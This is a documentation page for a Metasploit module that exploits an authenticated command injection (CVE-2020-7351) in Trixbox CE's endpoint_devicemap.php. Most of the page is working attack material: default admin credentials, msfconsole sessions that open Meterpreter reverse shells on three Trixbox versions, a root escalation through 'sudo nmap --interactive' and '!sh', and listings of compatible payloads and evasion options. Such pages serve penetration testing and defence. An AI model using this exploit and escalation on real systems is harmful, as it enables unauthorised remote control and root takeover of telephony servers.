TrixBox CE endpoint_devicemap.php Authenticated Command Execution - Metasploit


This page contains detailed information about how to use the exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: TrixBox CE endpoint_devicemap.php Authenticated Command Execution
Module: exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce
Source code: modules/exploits/unix/webapp/trixbox_ce_endpoint_devicemap_rce.rb
Disclosure date: 2020-04-28
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): cmd, x86, x64
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-7351

This module exploits an authenticated OS command injection vulnerability found in Trixbox CE version 1.2.0 to 2.8.0.4 inclusive in the "network" POST parameter of the "/maint/modules/endpointcfg/endpoint_devicemap.php" page. Successful exploitation allows for arbitrary command execution on the underlying operating system as the "asterisk" user. Users can easily elevate their privileges to the "root" user however by executing "sudo nmap --interactive" followed by "!sh" from within nmap.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


msf > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce
msf exploit(trixbox_ce_endpoint_devicemap_rce) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


Description

This module exploits an authenticated OS command injection vulnerability found in Trixbox CE version 1.2.0 to 2.8.0.4 inclusive in the "network" POST parameter of the "/maint/modules/endpointcfg/endpoint_devicemap.php" page. Successful exploitation allows for arbitrary command execution on the underlying operating system as the "asterisk" user. Users can easily elevate their privileges to the "root" user however by executing "sudo nmap --interactive" followed by "!sh" from within nmap.

Installation And Setup

  1. Download the latest version of Trixbox CE (i.e. v2.8.0.4 ISO).
  2. Set up a new CentOS machine in VirtualBox or VMWare and load the ISO. Be sure to disable any autosetup features of VMWare or VirtualBox. Follow the install prompts and note the root password you choose to use. Once Package Installation appears on the screen, wait for the system to finish rebooting several times, after which the following screen should be displayed:
    CentOS release 4.3 (Final) Kernel 2.6.9-34.EL on an i686

asterisk1 login: 3. Log into via the terminal using the username `root` and the password you set for the `root` user during installation. 4. A prompt similar to the following should be displayed: For access to the trixbox web GUI use this URL: http://192.168.205.144 `` 5. Once this prompt is displayed, take the IP address and browse to the URL http://*IP ADDRESS*/maint/, then log in with the default administrative credentials (maint:password`).

Verification Steps


Follow Setup and Scenarios.

Scenarios


Trixbox CE v2.8.0.4

msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce
msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set rhosts 192.168.1.8
rhosts => 192.168.1.8
msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options

Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  password         yes       Password to login with
   HttpUsername  maint            yes       User to login with
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.1.8      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT         80               yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Linux Dropper)


msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set lhost 192.168.1.10
lhost => 192.168.1.10
msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.10:4444
[*] 192.168.1.8:80 - Authenticating using "maint:password" credentials...
[+] 192.168.1.8:80 - Authenticated successfully.
[+] 192.168.1.8:80 - Trixbox CE v2.8.0.4 identified.
[*] 192.168.1.8:80 - Sending payload (150 bytes)...
[*] Sending stage (980808 bytes) to 192.168.1.8
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.8:38680) at 2020-05-02 03:55:24 -0400
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > sysinfo
Computer     : trixbox1.localdomain
OS           : CentOS 5.5 (Linux 2.6.18-164.11.1.el5)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 9259 created.
Channel 1 created.
id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
whoami
asterisk

Trixbox CE v2.4.0

msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce
msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options

Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  password         yes       Password to login with
   HttpUsername  maint            yes       User to login with
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.1.7      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT         80               yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Linux Dropper)


msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set lhost 192.168.1.10
lhost => 192.168.1.10
msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.10:4444
[*] 192.168.1.7:80 - Authenticating using "maint:password" credentials...
[+] 192.168.1.7:80 - Authenticated successfully.
[+] 192.168.1.7:80 - Trixbox CE v2.4.0 identified.
[*] 192.168.1.7:80 - Sending payload (150 bytes)...
[*] Sending stage (980808 bytes) to 192.168.1.7
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.7:4478) at 2020-05-02 03:52:53 -0400
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > sysinfo
Computer     : trixbox1.localdomain
OS           : CentOS 5 (Linux 2.6.18-53.1.4.el5)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 14144 created.
Channel 1 created.
id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
whoami
asterisk

Trixbox CE v1.2.0

msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce 
msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options

Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  password         yes       Password to login with
   HttpUsername  maint            yes       User to login with
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT         80               yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Linux Dropper)


msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set LHOST 192.168.205.1
LHOST => 192.168.205.1
msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set SRVHOST 192.168.205.1
SRVHOST => 192.168.205.1
msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set RHOSTS 192.168.205.148
RHOSTS => 192.168.205.148
msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit

[*] Started reverse TCP handler on 192.168.205.1:4444 
[*] 192.168.205.148:80 - Authenticating using "maint:password" credentials...
[+] 192.168.205.148:80 - Authenticated successfully.
[+] 192.168.205.148:80 - Trixbox CE v1.2.0 identified.
[*] 192.168.205.148:80 - Sending payload (150 bytes)...
[*] Sending stage (980808 bytes) to 192.168.205.148
[*] Meterpreter session 1 opened (192.168.205.1:4444 -> 192.168.205.148:32775) at 2020-05-04 12:53:23 -0500
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > sysinfo
Computer     : asterisk1.local
OS           : CentOS 4.4 (Linux 2.6.9-42.0.2.EL)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 5678 created.
Channel 1 created.
id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
whoami
asterisk

Privilege Elevation Steps


Once a shell has been gained as the asterisk user, attackers can elevate their privileges to root by executing the following commands:

sudo nmap --interactive

Starting Nmap V. 4.76 ( http://nmap.org )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Go back to menu.

Msfconsole Usage


Here is how the unix/webapp/trixbox_ce_endpoint_devicemap_rce exploit module looks in the msfconsole:

msf6 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce

[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show info

       Name: TrixBox CE endpoint_devicemap.php Authenticated Command Execution
     Module: exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-04-28

Provided by:
  Anastasios Stasinopoulos ( <Anastasios Stasinopoulos (@ancst)>

Available targets:
  Id  Name
  --  ----
  0   Automatic (Linux Dropper)
  1   Automatic (Unix In-Memory)

Check supported:
  Yes

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  HttpPassword  password         yes       Password to login with
  HttpUsername  maint            yes       User to login with
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         80               yes       The target port (TCP)
  SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT       8080             yes       The local port to listen on.
  SSL           false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                        no        The URI to use for this exploit (default is random)
  VHOST                          no        HTTP server virtual host

Payload information:
  Avoid: 1 characters

Description:
  This module exploits an authenticated OS command injection 
  vulnerability found in Trixbox CE version 1.2.0 to 2.8.0.4 inclusive 
  in the "network" POST parameter of the 
  "/maint/modules/endpointcfg/endpoint_devicemap.php" page. Successful 
  exploitation allows for arbitrary command execution on the 
  underlying operating system as the "asterisk" user. Users can easily 
  elevate their privileges to the "root" user however by executing 
  "sudo nmap --interactive" followed by "!sh" from within nmap.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-7351
  https://github.com/rapid7/metasploit-framework/pull/13353

Module Options


This is a complete list of options available in the unix/webapp/trixbox_ce_endpoint_devicemap_rce exploit:

msf6 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options

Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  password         yes       Password to login with
   HttpUsername  maint            yes       User to login with
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Linux Dropper)

Advanced Options


Here is a complete list of advanced options supported by the unix/webapp/trixbox_ce_endpoint_devicemap_rce exploit:

msf6 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show advanced

Module advanced options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   CMDSTAGER::DECODER                                                          no        The decoder stub to use.
   CMDSTAGER::FLAVOR       auto                                                no        The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write, echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, lwprequest, psh_i
                                                                                         nvokewebrequest)
   CMDSTAGER::SSL          false                                               no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                             no        Writable directory for staged files
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   ListenerComm                                                                no        The specific communication channel to use for this service
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                               no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x86/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/webapp/trixbox_ce_endpoint_devicemap_rce module can exploit:

msf6 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic (Linux Dropper)
   1   Automatic (Unix In-Memory)

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/webapp/trixbox_ce_endpoint_devicemap_rce exploit:

msf6 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/pingback_bind_tcp                                normal  No     Linux x64 Pingback, Bind TCP Inline
   12  payload/linux/x64/pingback_reverse_tcp                             normal  No     Linux x64 Pingback, Reverse TCP Inline
   13  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   14  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   15  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   16  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   17  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   18  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   19  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   20  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   21  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   22  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   23  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   24  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   25  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   26  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   27  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   28  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   30  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   31  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   32  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   33  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   34  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   35  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   36  payload/linux/x86/read_file                                        normal  No     Linux Read File
   37  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   38  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   39  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   40  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   41  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   42  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   43  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   45  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   46  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   47  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   48  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   49  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   50  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the unix/webapp/trixbox_ce_endpoint_devicemap_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Unable to grab version of Trixbox CE installed on target!


Here is a relevant code snippet related to the "<PEER> - Unable to grab version of Trixbox CE installed on target!" error message:

78:	  def get_target(res)
79:	    version = res.body.scan(/v(\d.\d.{0,1}\d{0,1}.{0,1}\d{0,1})/).flatten.first
80:	    if version.nil?
81:	      version = res.body.scan(/Version: (\d.\d.{0,1}\d{0,1}.{0,1}\d{0,1})/).flatten.first
82:	      if version.nil?
83:	        print_error("#{peer} - Unable to grab version of Trixbox CE installed on target!")
84:	        return nil
85:	      end
86:	    end
87:	    print_good("#{peer} - Trixbox CE v#{version} identified.")
88:	    if Rex::Version.new(version).between?(Rex::Version.new('2.6.0.0'), Rex::Version.new('2.8.0.4'))

<PEER> - Authentication failed.


Here is a relevant code snippet related to the "<PEER> - Authentication failed." error message:

112:	    end
113:	
114:	    if res.code == 200
115:	      print_good("#{peer} - Authenticated successfully.")
116:	    elsif res.code == 401
117:	      print_error("#{peer} - Authentication failed.")
118:	    else
119:	      print_error("#{peer} - The host responded with an unexpected status code: #{res.code}.")
120:	    end
121:	    return res
122:	  rescue ::Rex::ConnectionError

